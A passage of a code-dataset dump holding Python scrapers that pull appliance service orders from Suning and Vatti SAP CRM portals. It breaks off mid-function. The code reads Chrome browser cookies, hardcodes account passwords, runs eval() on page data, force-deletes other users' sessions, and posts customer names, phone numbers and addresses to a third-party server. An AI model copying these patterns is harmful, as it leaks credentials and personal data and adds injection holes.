"text": "import json\nimport re\nimport time\nfrom datetime import date, timedelta\nfrom urllib import parse\nfrom urllib.parse import urlencode, urlparse\n\nimport requests\n\nfrom BaseUtil import BaseUtil\nfrom cookie_test import fetch_chrome_cookie\n\n\nclass SuningUtil(BaseUtil):\n\n def __init__(self, username, passwd, adminid='24', factoryid='4', baseurl='http://ases.suning.com',\n bjdomain='http://yxgtest.bangjia.me'):\n super(SuningUtil, self).__init__(username, passwd, adminid, factoryid, baseurl, bjdomain)\n self.headers['Accept'] = \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,\" \\\n \"*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\"\n # self.headers['Content-Type'] = 'application/x-www-form-urlencoded; charset=UTF-8'\n self.headers['Accept-Encoding'] = 'gzip, deflate'\n self.headers['Accept-Language'] = 'zh-CN,zh;q=0.9'\n self.cookie = fetch_chrome_cookie([\n {\"domain\": \"ases.suning.com\"},\n {\"domain\": \".ases.suning.com\"},\n {\"domain\": \".suning.com\"},\n {\"domain\": \"tianyan.suning.com\"},\n ], isExact=True)\n self.cookies = BaseUtil.getCookies(self.cookie)\n self.headers['Cookie'] = self.cookie\n # print(self.cookie)\n self.userinfo = None\n\n def loadBI(self, param=None):\n # print(\"===================loadBI\")\n loginurl = self.baseurl + \"/ases-web/main/homeServiceOrders/biSmgzbb.action\"\n header = self.headers.copy()\n del header['Content-Type']\n del header['Origin']\n loginRes = self.session.get(loginurl, headers=header)\n url = loginRes.url\n print(url)\n return url if \"guId\" in url else None\n\n def loadMenu(self, param=None):\n # print(\"===================loadMenu\")\n loginurl = self.baseurl + \"/ases-web/main/menu/queryMenu.action?pId=FUN_18_02\"\n self.headers['Accept'] = 'application/json, text/plain, */*'\n self.headers['Referer'] = self.baseurl + '/ases-web/index.html'\n menuRes = self.session.get(loginurl, headers=self.headers)\n # print(menuRes.headers) # FUN_18_02_33 BI FUN_18_02_04:改派工人管理\n # print(menuRes.text)\n\n def getUserinfo(self, param=None):\n # self.loadMenu()\n print(\"===================getUserinfo\")\n loginurl = self.baseurl + \"/ases-web/main/user/userInfo.action\"\n self.headers['Accept'] = 'application/json, text/plain, */*'\n self.headers['Referer'] = self.baseurl + '/ases-web/index.html'\n print(\"headers=\", self.headers)\n userRes = self.session.get(loginurl, headers=self.headers)\n print(\"userRes=\", userRes.text)\n userinfo = self.getjson(userRes)\n print(userinfo)\n if userinfo and userinfo['result'] and userinfo['data']:\n wd = userinfo['data']['wd']\n supplierCode = userinfo['data']['supplierCode']\n userId = userinfo['data']['userId']\n companyCode = userinfo['data']['companyCode'][0]\n result = {\"wd\": wd, \"supplierCode\": supplierCode, \"userId\": userId, \"companyCode\": companyCode}\n return result\n return None\n\n def loadOrders(self, param=None):\n # print(\"=================================loadOrders\")\n if not self.userinfo:\n self.userinfo = self.getUserinfo()\n if not self.userinfo:\n return self.datafail\n biurl = self.loadBI()\n if not biurl:\n return self.datafail\n parsed_uri = urlparse(biurl)\n tianyanbase = parsed_uri.scheme + \"://\" + parsed_uri.netloc\n url = tianyanbase + \"/lbi-web-in/ww/visittrack/queryGrid.action\"\n header = {'Content-Type': 'application/x-www-form-urlencoded',\n 'User-Agent': self.agent, 'Upgrade-Insecure-Requests': '1',\n 'Host': parsed_uri.netloc, 'Origin': tianyanbase, 'Cookie': self.cookie,\n 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive',\n 'Accept-Language': 'zh-CN,zh;q=0.9',\n 'Accept': 'text/html, */*; q=0.01'}\n bires = self.session.get(biurl, headers=header)\n # print(\"bires=\", bires.text)\n # print(\"bires header=\", bires.headers)\n cookies = self.cookies.copy()\n for c in bires.cookies:\n cookies[c.name] = c.value\n # print(c.name, c.value)\n header['Referer'] = biurl\n header['Cookie'] = self.initCookie(cookies)\n orders = list(self.searchBI(url, header, 1))\n print(\"loadOrders result count=\", len(orders))\n try:\n data = {\"data\": json.dumps(orders)}\n # print(data)\n requests.post(self.bjdomain + \"/Api/Climborder/addorder\", data=data)\n self.loadGaipaiOrder()\n except:\n return self.dataverify\n return self.datasuccess\n\n def initCookie(self, cookies=None):\n if not cookies:\n return \"\"\n result = \"\"\n for cookie in cookies:\n result += cookie + \"=\" + cookies[cookie] + \"; \"\n return result[:-2]\n\n def searchBI(self, url, header, page=1, totalcount=100):\n params = {\"wd\": self.userinfo['wd'][0], \"companyCode\": self.userinfo['companyCode'],\n \"reservationStartDate\": (date.today() - timedelta(days=1)).strftime(\"%Y%m%d\"),\n \"reservationEndDate\": (date.today() + timedelta(days=1)).strftime(\"%Y%m%d\"),\n \"sapOrderType\": \"ZS01,ZS02,ZS03,ZS04,ZS06,ZS11,ZS12,ZS24\",\n \"page\": str(page), \"pageSize\": \"10\"\n }\n # print(\"header['Cookie']=\", header['Cookie'])\n biresult = self.session.post(url, headers=header, data=params)\n # print(\"url=\", url, \"biresult=\", biresult.text)\n soup = self.getsoup(biresult)\n totalRe = re.findall(re.compile(r\"(\\d+)\", re.S), soup.find(\"span\", {\"class\": \"total\"}).text.strip())\n if totalRe and len(totalRe) > 0:\n totalcount = totalRe[0]\n try:\n pageCount = int(soup.find(\"input\", {\"id\": \"pageCount\"})['value'])\n except:\n pageCount = 0\n resulttable = soup.find(\"table\", {\"class\": \"webtable\"})\n isall = page + 1 > pageCount\n print(\"totalcount=\", totalcount, \"pageCount=\", pageCount, \"page=\", page, \"isall=\", isall)\n if resulttable:\n yield from self.parseOrders2(resulttable.find_all(\"tr\"), header['Referer'])\n if not isall:\n yield from self.searchBI(url, header, page + 1, totalcount)\n\n def parseOrders2(self, tr_list, biurl):\n for tr in tr_list:\n if tr.has_attr('class'):\n continue\n order = self.parseOrder(tr)\n if order:\n yield self.orderdetail(order, biurl)\n\n def parseOrder(self, tr):\n tablecolumns = tr.find_all(\"td\")\n try:\n orderno_td = tablecolumns[0]\n addr = tablecolumns[14].text.strip().split(\";\") # 0;安徽省;六安市;****\n orderitem = orderno_td.find(\"a\")\n if orderitem:\n # 这个是元素的点击事件id,下一个页面需要用到\n data = {\n \"oid\": re.findall(re.compile(r\"[(]'(.*?)'[)]\", re.S), orderitem[\"onclick\"])[0],\n 'factorynumber': self.finda(orderno_td), 'originname': tablecolumns[16].text.strip(),\n 'username': tablecolumns[13].text.strip(), 'mobile': tablecolumns[15].text.strip(),\n 'ordername': tablecolumns[2].text.strip().replace(\"服务订单\", \"\"),\n 'ordertime': tablecolumns[6].text.strip(), 'mastername': tablecolumns[23].text.strip(),\n 'province': addr[1] if len(addr) > 1 else \"\", 'city': addr[2] if len(addr) > 2 else \"\",\n 'companyid': self.factoryid, 'machinebrand': tablecolumns[9].text.strip().split(\"(\")[0],\n 'machinetype': tablecolumns[8].text.strip(), 'version': tablecolumns[7].text.strip(),\n # 'machinebrand': re.findall(re.compile(r\"(.*?)[(].*?[)]\", re.S), tablecolumns[9].text.strip())[0],\n 'orderstatus': tablecolumns[4].text.strip(), 'adminid': self.adminid}\n print(\"parseorder data=\", data)\n return data # if self.isNew(data, self.bjdomain, self.adminid) else None\n except Exception as e:\n print(\"parseorder exception\", e)\n return None\n\n def orderdetail(self, data, biurl):\n \"\"\"获取到的是aes加密后的数据,暂未找到破解方法\"\"\"\n # url = self.baseurl + \"/ases-web/main/external/bi/changeShow.action?orderId=\" + data['oid']\n # header = self.headers.copy()\n # header['Referer'] = biurl\n # detailRes = self.session.get(url, headers=header)\n # print(\"detailRes=\", detailRes.text)\n # print(\"detail url=\", detailRes.url)\n return data\n\n def loadGaipaiOrder(self):\n # 开始加载工单\n self.headers['Accept'] = \"application/json, text/plain, */*\"\n self.headers['Content-Type'] = 'application/json'\n url = self.baseurl + \"/ases-web/main/ui/dispatchWorker/queryList.action\"\n params = {\"wds\": self.userinfo['wd'], \"companyCode\": self.userinfo['companyCode'],\n \"srvTimeStart\": (date.today() - timedelta(days=3)).strftime(\"%Y-%m-%d\"),\n \"srvTimeEnd\": (date.today() + timedelta(days=3)).strftime(\"%Y-%m-%d\"),\n \"page\": \"1\", \"pageSize\": \"100\"\n }\n url = url + \"?\" + str(parse.urlencode(params))\n orderRes = self.session.get(url, headers=self.headers)\n gaipaiOrder = self.parseOrders(orderRes)\n \"\"\"以下获取的es数据也为加密后的数据\"\"\"\n # print(\"orderRes.text=\", orderRes.text)\n # esurl = self.baseurl + \"/ases-web/main/ui/smOrder/queryListFromES.action\"\n # self.headers['Content-Type'] = 'application/x-www-form-urlencoded'\n # self.headers['Accept-Encoding'] = 'gzip, deflate'\n # self.headers['Accept'] = 'application/json, text/plain, */*'\n # params = {\"wd\": self.userinfo['wd'][0], \"companyCode\": self.userinfo['companyCode'],\n # \"srvSaleCountStart\": (date.today() - timedelta(days=3)).strftime(\"%Y-%m-%d\"),\n # \"srvSaleCountEnd\": (date.today() + timedelta(days=3)).strftime(\"%Y-%m-%d\"),\n # \"createTimeStart\": \"\", \"createTimeEnd\": \"\", \"finishTimeStart\": \"\", \"finishTimeEnd\": \"\",\n # \"orderId\": \"\", \"cmmdtyCtgry\": \"\", \"cityCodes\": \"\", \"mobPhoneNum\": \"\",\n # \"page\": \"1\", \"pageSize\": \"100\"\n # }\n # print(\"esorder params=\", params)\n # orderRes = self.session.post(esurl, headers=self.headers, data=params)\n # print(\"esorder orderRes.text=\", orderRes.text)\n # ESOrder = self.parseOrders(orderRes)\n ESOrder = []\n try:\n data = {\"data\": json.dumps(gaipaiOrder + ESOrder)}\n # print(data)\n requests.post(self.bjdomain + \"/Api/Climborder/addorder\", data=data)\n except:\n return self.dataverify\n return self.datasuccess\n\n def parseOrders(self, orderRes):\n datas = self.getjson(orderRes)\n orders = []\n if datas and 'result' in datas and datas['result'] and datas['data']:\n items = datas['data']['datas']\n else:\n return orders\n for item in items:\n orders.append({\n 'factorynumber': item['orderId'], 'ordername': item['operateItemDec'],\n 'username': item['consignee'], 'mobile': item['mobPhoneNum'],\n 'orderstatus': \"改派工人\", 'originname': \"苏宁\",\n # 'machinetype': item['PROD_NAME'], 'machinebrand': item['BRAND_NAME'],\n 'sn': item['cmmdtyCode'], 'version': item['cmmdtyName'] if 'cmmdtyName' in item else '',\n 'repairtime': item['srvTime'] if 'srvTime' in item else '',\n 'mastername': item['zyry1BpName'] if 'zyry1BpName' in item else '',\n 'note': item['srvMemo'] if 'srvMemo' in item else '',\n 'companyid': self.factoryid, 'adminid': self.adminid,\n 'address': str(item['srvAddress']).replace(\";\", \"\").strip(),\n # 'province': item['provinceName'], 'city': item['cityName'],\n # 'county': item['regionName'], 'town': item['countyName'],\n 'description': str(item['orderType']) + self.parseOrderType(item['orderType']),\n })\n return orders\n\n def parseOrderType(self, ordertype):\n if ordertype == \"ZS01\":\n return \"新机安装\"\n elif ordertype == \"ZS02\":\n return \"辅助安装\"\n elif ordertype == \"ZS03\":\n return \"移机\"\n elif ordertype == \"ZS04\":\n return \"退换货拆装\"\n elif ordertype == \"ZS06\":\n return \"上门维修\"\n elif ordertype == \"ZS09\":\n return \"用户送修检测\"\n elif ordertype == \"ZS10\":\n return \"用户送修维修\"\n elif ordertype == \"ZS11\":\n return \"上门鉴定\"\n elif ordertype == \"ZS12\":\n return \"清洗/保养\"\n elif ordertype == \"ZS24\":\n return \"家电回收\"\n elif ordertype == \"ZS30\":\n return \"家装\"\n else:\n return \"安装\"\n\n\nif __name__ == '__main__':\n util = SuningUtil('W850018433', 'sn789456', adminid='24', factoryid='99')\n print(util.loadOrders())\n # print(util.loadBI())\n"
},
{
"alpha_fraction": 0.5049610733985901,
"alphanum_fraction": 0.578437328338623,
"avg_line_length": 60.40142059326172,
"blob_id": "28901bc08f935f8fa5615f579c1a5fa9f325686d",
"content_id": "aef4e05cbf7980b2d163ea0f84a678f99c224c4d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 35375,
"license_type": "no_license",
"max_line_length": 159,
"num_lines": 563,
"path": "/huadi_zb.py",
"repo_name": "chengyan1984/cdk-gui",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nimport requests\nimport json\nfrom bs4 import BeautifulSoup\nimport re\nfrom datetime import date, timedelta, datetime\nfrom Util import Util\n\n\nclass HDScrap(Util):\n def __init__(self, username='01007544', pwd='160324', baseurl=\"http://cc.vatti.com.cn:8180\", adminid='3',\n bjdomain='http://yxgtest.bangjia.me', companyid='9'):\n self.session = requests.Session()\n self.username = username\n self.passwd = pwd\n self.baseurl = baseurl\n self.codeFaultTimes = 0\n self.loginFaultTimes = 0\n self.adminid = adminid\n self.bjdomain = bjdomain\n self.datasuccess = {'code': 1, 'msg': '抓单成功', 'element': ''}\n self.datafail = {'code': 0, 'msg': '登录失败,请检查账号密码是否正确'}\n self.isSucess = False\n self.companyid = companyid\n self.mainurl = None\n self.headers = {'Content-type': 'text/html', 'Accept-Encoding': 'gzip, deflate',\n 'Accept-Language': 'en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7,pt;q=0.6', 'Connection': 'keep-alive',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,'\n '*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',\n 'Host': \"cc.vatti.com.cn:8180\",\n 'Origin': baseurl,\n # 'User-Agent': agent,\n 'User-Agent': \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) \"\n \"Chrome/79.0.3945.88 Safari/537.36\"}\n\n def get_lsdata(self, element):\n data = element[\"lsdata\"]\n data = data.replace(r\"true\", '1')\n data = data.replace(r\"false\", '0')\n return eval(data)[2]\n\n def get_value(self, element):\n return element[\"value\"]\n\n def loginHd(self):\n loginurl = self.baseurl + '/sap/bc/bsp/sap/crm_ui_start/default.htm?sap-client=800&sap-language=ZH'\n print(\"url=\" + loginurl + \",passwd=\" + self.passwd)\n self.headers['Referer'] = loginurl\n loginRes = self.session.get(loginurl, headers=self.headers)\n loginRes.encoding = 'utf-8'\n bsObj = BeautifulSoup(loginRes.text, features=\"lxml\")\n # print(\"=========================\")\n processname = self.get_value(bsObj.find(\"input\", {\"name\": \"sap-system-login\"}))\n sap_client = self.get_value(bsObj.find(\"input\", {\"id\": \"sap-client\"}))\n loginxsrf = bsObj.find(\"input\", {\"name\": \"sap-login-XSRF\"})[\"value\"]\n params = {\"FOCUS_ID\": self.get_value(bsObj.find(\"input\", {\"id\": \"FOCUS_ID\"})),\n \"sap-system-login-oninputprocessing\": processname,\n \"sap-system-login\": processname,\n \"sap-login-XSRF\": loginxsrf,\n \"sysid\": self.get_lsdata(bsObj.find(\"input\", {\"id\": \"sysid\"})),\n \"sap-client\": sap_client,\n \"sap-user\": self.username, \"sap-password\": self.passwd,\n \"SAPEVENTQUEUE\": \"Form_Submit~E002Id~E004SL__FORM~E003~E002ClientAction~E004submit~E005ActionUrl~E004\"\n \"~E005ResponseData~E004full~E005PrepareScript~E004~E003~E002~E003\",\n \"sap-language\": self.get_value(bsObj.find(\"input\", {\"id\": \"sap-language\"})),\n \"sap-language-dropdown\": self.get_value(bsObj.find(\"input\", {\"id\": \"sap-language-dropdown\"}))}\n self.headers['Content-type'] = \"application/x-www-form-urlencoded\"\n checkRes = self.session.post(loginurl, data=params, headers=self.headers)\n self.selectrole()\n return self.checkstatus(checkRes)\n\n def checkstatus(self, response, callback=None):\n bsObj = self.getsoup(response)\n nextbtn = bsObj.find_all(\"a\", {\"id\": \"SESSION_QUERY_CONTINUE_BUTTON\"})\n logonbtn = bsObj.find_all(\"a\", {\"id\": \"LOGON_BUTTON\"})\n # 如果账号密码错误 或者其他问题,直接返回\n if response.status_code != 200:\n return self.datafail\n # 如果有其他账户在登陆,点击继续\n elif nextbtn:\n return self.continuelogon()\n elif logonbtn:\n return self.datafail\n if callback:\n return callback(bsObj)\n return self.datasuccess\n\n def continuelogon(self, callback=None):\n \"\"\" 点击继续,踢掉其他用户继续当前会话 \"\"\"\n print(\"有其他账户登陆,点击继续\")\n params = {\"FOCUS_ID\": \"SESSION_QUERY_CONTINUE_BUTTON\",\n \"sap-system-login-oninputprocessing\": \"onSessionQuery\",\n \"sap-system-login\": \"onSessionQuery\",\n \"sap-client\": '800',\n \"SAPEVENTQUEUE\": \"Form_Submit~E002Id~E004SL__FORM~E003~E002ClientAction~E004submit~E005ActionUrl~E004\"\n \"~E005ResponseData~E004full~E005PrepareScript~E004~E003~E002~E003\",\n \"sap-language\": 'ZH',\n \"delete-session-cb\": 'X', \"delete_session\": 'X'\n }\n self.headers['Content-type'] = \"application/x-www-form-urlencoded\"\n url = self.baseurl + '/sap/bc/bsp/sap/crm_ui_start/default.htm'\n checkRes = self.session.post(url, data=params, headers=self.headers)\n # print(checkRes.status_code)\n if checkRes.status_code != 200:\n return self.datafail\n result = self.selectrole()\n if callback:\n return callback()\n return result\n\n def selectrole(self):\n # print('=========================选择角色')\n url = self.baseurl + \"/sap/bc/bsp/sap/crm_ui_frame/main.htm?sap-client=800&sap-language=ZH&sap-domainRelax\" \\\n \"=min&saprole=ZIC_AGENT_08&sapouid=50000265&sapoutype=S\"\n roleRes = self.session.get(url, headers=self.headers)\n if roleRes.status_code != 200:\n return self.datafail\n return self.datasuccess\n\n def getsoup(self, response):\n # print(response.status_code)\n response.encoding = 'utf-8'\n return BeautifulSoup(response.text, features=\"lxml\")\n\n def transfer_order(self, statuscode=None):\n # print('=========================loadFrame1 加载左边的动作栏')\n url = self.mainurl\n if not url or len(url) <= 1:\n url = self.baseurl + \"/sap/bc/bsp/sap/crm_ui_frame/BSPWDApplication.do?sap-client=800&sap-language=ZH&sap\" \\\n \"-domainrelax=min&saprole=ZIC_AGENT_08&sapouid=50000265&sapoutype=S\"\n self.headers['Accept'] = 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9'\n del self.headers['Content-type']\n actionRes = self.session.get(url, headers=self.headers)\n # print(actionRes.text)\n result = self.checkstatus(actionRes)\n if result['code'] == 1:\n try:\n bsObj = self.getsoup(actionRes)\n if not bsObj:\n return self.datafail\n sercureid = self.get_value(bsObj.find(\"input\", {\"id\": \"wcf-secure-id\"}))\n cb_flash = self.get_value(bsObj.find(\"input\", {\"id\": \"callbackFlashIslands\"}))\n cb_light = self.get_value(bsObj.find(\"input\", {\"id\": \"callbackSilverlightIslands\"}))\n data = {\"data\": json.dumps(self.loadallsearch(sercureid, cb_flash, cb_light, statuscode))}\n if statuscode:\n data['vatti_type'] = 1\n # print(\"transfer_order:\", data)\n result = requests.post(self.bjdomain + \"/Api/Climborder/addorder\", data=data)\n # print(result)\n except Exception as e:\n print(\"transfer_order exception\", e)\n return self.datafail\n return self.datasuccess\n else:\n return self.datafail\n\n def loadsearch(self, sercureid, cb_flash, cb_light):\n # print('=========================loadsearch 加载工单查询初始页面')\n params = {\"callbackFlashIslands\": cb_flash,\n \"callbackSilverlightIslands\": cb_light,\n \"htmlbevt_frm\": \"myFormId\",\n \"htmlbevt_cnt\": \"0\",\n \"onInputProcessing\": \"htmlb\",\n \"htmlbevt_ty\": \"thtmlb:link:click:0\",\n \"htmlbevt_id\": \"ZSRV-02-SR\",\n \"htmlbevt_oid\": \"C6_W29_V30_ZSRV-01-SR\",\n \"thtmlbKeyboardFocusId\": \"C6_W29_V30_ZSRV-01-SR\",\n \"sap-ajaxtarget\": \"C1_W1_V2_C6_W29_V30_MainNavigationLinks.do\",\n \"sap-ajax_dh_mode\": \"AUTO\",\n \"wcf-secure-id\": sercureid,\n \"PREFIX_ID\": \"C9_W36_V37_\",\n \"LTX_PREFIX_ID\": \"C1_W1_V2_\",\n \"sap-ajax_request\": \"X\",\n \"C4_W23_V24_V25_tv1_multiParameter\": \"0////0////0////0\",\n \"C8_W34_V35_RecentObjects_isExpanded\": \"yes\",\n \"C4_W23_V24_V25_tv1_isCellerator\": \"TRUE\",\n \"C4_W23_V24_V25_tv1_isNavModeActivated\": \"TRUE\",\n \"C4_W23_V24_V25_tv1_filterApplied\": \"FALSE\",\n \"C4_W23_V24_V25_tv1_editMode\": \"NONE\",\n \"C4_W23_V24_V25_tv1_firstTimeRendering\": \"NO\",\n \"C9_W36_V37_POLLFREE_ALERTS\": \"{"Alerts":[]}\",\n \"C4_W23_V24_V25_tv1_configHash\": \"827DEA574484325768AF0E54A8EB7CBF8083ED01\",\n \"C3_W18_V19_V21_searchcustomer_struct.reltyp\": \"BUR001\",\n \"C4_W23_V24_V25_tv1_bindingString\": \"//CUSTOMERS/Table\",\n \"C13_W47_V48_SearchMenuAnchor1\": \"UP\"\n }\n sap = re.findall(re.compile(r'[(](.*?)[)]', re.S), params['callbackFlashIslands'])[0]\n url = self.baseurl + \"/sap(%s)/bc/bsp/sap/crm_ui_frame/BSPWDApplication.do\" % sap\n print(\"loadsearch url={}\".format(url))\n self.mainurl = url\n self.headers['Content-type'] = \"application/x-www-form-urlencoded\"\n self.headers['Referer'] = url\n # 该参数代表了是否异步加载,如果加了这个选项,会只能接受到建议的网页,导致解析出错,浪费2天时间\n # self.headers['X-Requested-With'] = \"XMLHttpRequest\"\n self.headers['Accept'] = \"*/*\"\n roleRes = self.session.post(url, data=params, headers=self.headers)\n # print(roleRes.text)\n return self.getsoup(roleRes), params\n\n def loadallsearch(self, sercureid, cb_flash, cb_light, statuscode=None):\n soup, params = self.loadsearch(sercureid, cb_flash, cb_light)\n confighash = str(soup.find(\"input\", {\"id\": \"C17_W61_V62_V64_ResultTable_configHash\"})[\"value\"])\n order = list(self.search(confighash, params, 0, statuscode=statuscode))\n return order\n\n def search(self, confighash, _params, page, totalcount=100, pagecount=50, statuscode=None):\n # print('=========================loadsearch 搜索', '增值工单' if not statuscode else '安装工单')\n target = \"C1_W1_V2_C1_W1_V2_V3_C17_W61_V62_SearchViewSet.do\" if page == 0 else \"C1_W1_V2_C1_W1_V2_V3_C17_W61_V62_C17_W61_V62_V64_advancedsrl.do\"\n oid = \"C17_W61_V62_Searchbtn\" if page == 0 else \"C17_W61_V62_V64_ResultTable\"\n focusid = \"C17_W61_V62_Searchbtn\" if page == 0 else \"C17_W61_V62_V64_ResultTable_pag_pg-%d\" % page\n params = {\n \"callbackFlashIslands\": _params['callbackFlashIslands'],\n \"callbackSilverlightIslands\": _params['callbackSilverlightIslands'],\n \"htmlbevt_frm\": \"myFormId\",\n \"htmlbevt_cnt\": \"0\" if page == 0 else \"1\", \"onInputProcessing\": \"htmlb\",\n \"htmlbevt_ty\": \"htmlb:button:click:0\" if page == 0 else \"thtmlb:tableView:navigate:null\",\n \"htmlbevt_id\": \"SEARCH_BTN\" if page == 0 else \"tvNavigator\",\n \"sap-ajax_dh_mode\": \"AUTO\",\n \"wcf-secure-id\": _params['wcf-secure-id'], \"PREFIX_ID\": \"C9_W36_V37_\",\n \"LTX_PREFIX_ID\": \"C1_W1_V2_\", \"sap-ajax_request\": \"X\",\n \"crmFrwScrollXPos\": \"0\", \"crmFrwScrollYPos\": \"267\",\n \"crmFrwOldScrollXPos\": \"0\", \"crmFrwOldScrollYPos\": \"267\", \"thtmlbScrollAreaWidth\": \"0\",\n \"thtmlbScrollAreaHeight\": \"0\", \"C13_W47_V48_SearchMenuAnchor1\": \"UP\",\n 'htmlbevt_oid': oid, 'thtmlbKeyboardFocusId': focusid,\n 'sap-ajaxtarget': target, 'currentDate': datetime.now().year,\n 'C17_W61_V62_V64_ResultTable_configHash': confighash,\n 'C17_W61_V62_V64_ResultTable_multiParameter': \"0////0////0////0\",\n 'C17_W61_V62_V64_ResultTable_bindingString': \"//BTQRSrvOrd/Table\",\n 'C17_W61_V62_V64_ResultTable_sortValue': 'CREATED_AT#:#desc#!#',\n 'C17_W61_V62_V63_btqsrvord_max_hits': \"9\" if statuscode else \"9\", # 一次查询最大多少条\n 'C17_W61_V62_thtmlbShowSearchFields': \"true\",\n 'C17_W61_V62_V64_ResultTable_isNavModeActivated': \"TRUE\",\n 'C17_W61_V62_V64_ResultTable_filterApplied': \"FALSE\", 'C17_W61_V62_V64_ResultTable_isCellerator': \"TRUE\",\n 'C17_W61_V62_V64_ResultTable_editMode': \"NONE\",\n 'C17_W61_V62_V64_ResultTable_visibleFirstRow': str(1 + page * 10),\n \"C17_W61_V62_V63_btqsrvord_parameters[1].FIELD\": \"POSTING_DATE\",\n \"C17_W61_V62_V63_btqsrvord_parameters[1].OPERATOR\": \"GT\" if not statuscode else \"EQ\",\n \"C17_W61_V62_V63_btqsrvord_parameters[1].VALUE1\": (date.today() - timedelta(days=1)).strftime(\"%Y.%m.%d\"),\n \"C17_W61_V62_V63_btqsrvord_parameters[1].VALUE2\": \"\",\n \"C17_W61_V62_V63_btqsrvord_parameters[2].FIELD\": \"ZZFLD000057\",\n \"C17_W61_V62_V63_btqsrvord_parameters[2].OPERATOR\": \"EQ\",\n \"C17_W61_V62_V63_btqsrvord_parameters[2].VALUE1\": \"\",\n \"C17_W61_V62_V63_btqsrvord_parameters[2].VALUE2\": \"\",\n \"C17_W61_V62_V63_btqsrvord_parameters[3].FIELD\": \"ZZFLD000063\",\n \"C17_W61_V62_V63_btqsrvord_parameters[3].OPERATOR\": \"EQ\",\n \"C17_W61_V62_V63_btqsrvord_parameters[3].VALUE1\": \"\",\n \"C17_W61_V62_V63_btqsrvord_parameters[3].VALUE2\": \"\",\n \"C17_W61_V62_V63_btqsrvord_parameters[4].FIELD\": \"ZZFLD00005P\",\n \"C17_W61_V62_V63_btqsrvord_parameters[4].OPERATOR\": \"EQ\",\n \"C17_W61_V62_V63_btqsrvord_parameters[4].VALUE1\": \"01\" if not statuscode else \"\", # 工单来源是HD-华帝\n \"C17_W61_V62_V63_btqsrvord_parameters[4].VALUE2\": \"\",\n \"C17_W61_V62_V63_btqsrvord_parameters[5].FIELD\": \"OBJECT_ID\",\n \"C17_W61_V62_V63_btqsrvord_parameters[5].OPERATOR\": \"EQ\",\n \"C17_W61_V62_V63_btqsrvord_parameters[5].VALUE1\": \"\",\n \"C17_W61_V62_V63_btqsrvord_parameters[5].VALUE2\": \"\",\n \"C17_W61_V62_V63_btqsrvord_parameters[6].FIELD\": \"PROCESS_TYPE\",\n \"C17_W61_V62_V63_btqsrvord_parameters[6].OPERATOR\": \"EQ\",\n \"C17_W61_V62_V63_btqsrvord_parameters[6].VALUE1\": \"ZIC6\" if not statuscode else \"ZIC3\", # 工单类型为 增值服务单\n \"C17_W61_V62_V63_btqsrvord_parameters[6].VALUE2\": \"\",\n \"C17_W61_V62_V63_btqsrvord_parameters[7].FIELD\": \"ZZFLD00003J\",\n \"C17_W61_V62_V63_btqsrvord_parameters[7].OPERATOR\": \"EQ\",\n \"C17_W61_V62_V63_btqsrvord_parameters[7].VALUE1\": \"\",\n \"C17_W61_V62_V63_btqsrvord_parameters[7].VALUE2\": \"\",\n # \"C17_W61_V62_V63_btqsrvord_parameters[8].FIELD\": \"STATUS_COMMON\",\n # \"C17_W61_V62_V63_btqsrvord_parameters[8].OPERATOR\": \"EQ\",\n # \"C17_W61_V62_V63_btqsrvord_parameters[8].VALUE1\": \"M0002ZSIC0002\", # 状态为工单提交\n # \"C17_W61_V62_V63_btqsrvord_parameters[8].VALUE2\": \"\",\n # \"C17_W61_V62_V63_btqsrvord_parameters[9].FIELD\": \"ZZFLD000062\",\n # \"C17_W61_V62_V63_btqsrvord_parameters[9].OPERATOR\": \"EQ\",\n # \"C17_W61_V62_V63_btqsrvord_parameters[9].VALUE1\": \"\",\n # \"C17_W61_V62_V63_btqsrvord_parameters[9].VALUE2\": \"\",\n 'C17_W61_V62_V64_ResultTable_firstTimeRendering': \"NO\",\n \"C9_W36_V37_POLLFREE_ALERTS\": \"{"Alerts":[]}\",\n \"C17_W61_V62_V64_ResultTable_rowCount\": \"0\" if page == 0 else str(totalcount)\n }\n # if statuscode:\n # params[\"C17_W61_V62_V63_btqsrvord_parameters[8].FIELD\"] = \"STATUS_COMMON\"\n # params[\"C17_W61_V62_V63_btqsrvord_parameters[8].OPERATOR\"] = \"EQ\"\n # params[\"C17_W61_V62_V63_btqsrvord_parameters[8].VALUE1\"] = statuscode\n # params[\"C17_W61_V62_V63_btqsrvord_parameters[8].VALUE2\"] = \"\"\n if page != 0:\n params['htmlbevt_par1'] = \"page:%d,%d,%d,%d,P\" % (page + 1, 1 + page * pagecount, pagecount, totalcount)\n sap = re.findall(re.compile(r'[(](.*?)[)]', re.S), params['callbackFlashIslands'])[0]\n url = self.baseurl + \"/sap(%s)/bc/bsp/sap/crm_ui_frame/BSPWDApplication.do\" % sap\n self.headers['Content-type'] = \"application/x-www-form-urlencoded\"\n self.headers['Referer'] = url\n print(\"page={},totalcount={},url={},headers={}\".format(page, totalcount, url, self.headers))\n roleRes = self.session.post(url, data=params, headers=self.headers)\n bsObj = self.getsoup(roleRes)\n # if statuscode:\n # print(\"search result={}\".format(roleRes.text))\n resulttable = bsObj.find(\"table\", {\"id\": \"C17_W61_V62_V64_ResultTable_TableHeader\"}).find(\"tbody\")\n totalcount = int(bsObj.find(\"input\", {\"id\": \"C17_W61_V62_V64_ResultTable_rowCount\"})[\"value\"])\n isall = (page + 1) * pagecount >= totalcount\n print(\"totalcount=%d\" % totalcount + \",page=%d\" % page + \",isallloaded=%d\" % isall)\n if resulttable:\n yield from self.parseorderlist(resulttable.find_all(\"tr\"), url, params, statuscode)\n if not isall:\n yield from self.search(confighash, _params, page + 1, totalcount, pagecount, statuscode)\n\n def parseorderlist(self, trlist, url, params, statuscode):\n for tr in trlist:\n tablecolumns = tr.find_all(\"td\")\n if tr and len(tablecolumns) > 2:\n data = self.parseorder(tablecolumns, statuscode)\n if data:\n yield from self.orderdetail(data, url, params, statuscode)\n\n\n def parseorder(self, tablecolumns, statuscode=None):\n try:\n orderno_td = 